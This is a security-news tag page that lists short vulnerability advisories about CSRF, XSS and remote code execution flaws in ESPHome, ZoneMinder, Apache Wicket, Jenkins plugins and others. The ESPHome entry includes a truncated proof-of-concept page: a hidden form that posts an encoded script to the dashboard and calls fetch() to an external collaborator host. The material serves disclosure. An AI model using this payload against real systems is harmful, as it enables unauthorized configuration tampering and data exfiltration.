Security
Headlines
HeadlinesLatestCVEs

Tag

#csrf

GHSA-5925-88xh-6h99: Authentication bypass via Cross site request forgery

### Summary API endpoints in dashboard component of ESPHome version 2023.12.9 (command line installation) are vulnerable to Cross-Site Request Forgery (CSRF) allowing remote attackers to carry out attacks against a logged user of the dashboard to perform operations on configuration files (create, edit, delete). ### Details It is possible for a malicious actor to create a specifically crafted web page that triggers a cross site request against ESPHome, this allows bypassing the authentication for API calls on the platform. ### PoC An example of malicious web page that abuses this vulnerability: <html> <body> <form action="http://localhost:6052/edit?configuration=poc.yaml" id="#main" method="POST" enctype="text/plain" onsubmit="setTimeout(function () { window.location.reload(); }, 10)"> <input type="hidden" name="&lt;script&gt;&#13;&#10;fetch&#40;&apos;https&#58;&#47;&#47;907zv9yp9u3rjerkiakydpvcr3xulk99&#46;oastify&#46;com&#63;x" value="y&apos;&#44;&#32;&#123;&#13;&#10;method&...

ghsa
#csrf#vulnerability#web#auth
ZoneMinder Snapshots Remote Code Execution

ZoneMinder Snapshots versions prior to 1.37.33 suffer from an unauthenticated remote code execution vulnerability.

GHSA-8vvp-525h-cxf9: Cross-Site Request Forgery in Apache Wicket

An error in the evaluation of the fetch metadata headers could allow a bypass of the CSRF protection in Apache Wicket. This issue affects Apache Wicket: from 9.1.0 through 9.16.0, and the milestone releases for the 10.0 series. Apache Wicket 8.x does not support CSRF protection via the fetch metadata headers and as such is not affected. Users are recommended to upgrade to version 9.17.0 or 10.0.0, which fixes the issue.

SnipeIT 6.2.1 Cross Site Scripting

SnipeIT version 6.2.1 suffers from a persistent cross site scripting vulnerability.

NorthStar C2 Agent 1.0 Cross Site Scripting / Remote Command Execution

NorthStar C2 agent version 1.0 applies insufficient sanitization on agent registration routes, allowing an unauthenticated attacker to send multiple malicious agent registration requests to the teamserver to incrementally build a functioning javascript payload in the logs web page. This cross site scripting payload can be leveraged to execute commands on NorthStar C2 agents.

Numbas Remote Code Execution

Numbas versions prior to 7.3 suffer from a remote code execution vulnerability.

Akaunting 3.1.3 Remote Command Execution

Akaunting versions 3.1.3 and below suffer from a remote command execution vulnerability.

GHSA-64c5-r2h5-c2fg: Jenkins docker-build-step Plugin Cross-Site Request Forgery vulnerability

A cross-site request forgery (CSRF) vulnerability in Jenkins docker-build-step Plugin 2.11 and earlier allows attackers to connect to an attacker-specified TCP or Unix socket URL, and to reconfigure the plugin using the provided connection test parameters, affecting future build step executions.

GHSA-rv35-69ff-g9gv: Jenkins Subversion Partial Release Manager Plugin vulnerable to Cross-Site Request Forgery

A cross-site request forgery (CSRF) vulnerability in Jenkins Subversion Partial Release Manager Plugin 1.0.1 and earlier allows attackers to trigger a build.

WordPress Neon Text 1.1 Cross Site Scripting

WordPress Neon Text plugin versions 1.1 and below suffer from a persistent cross site scripting vulnerability.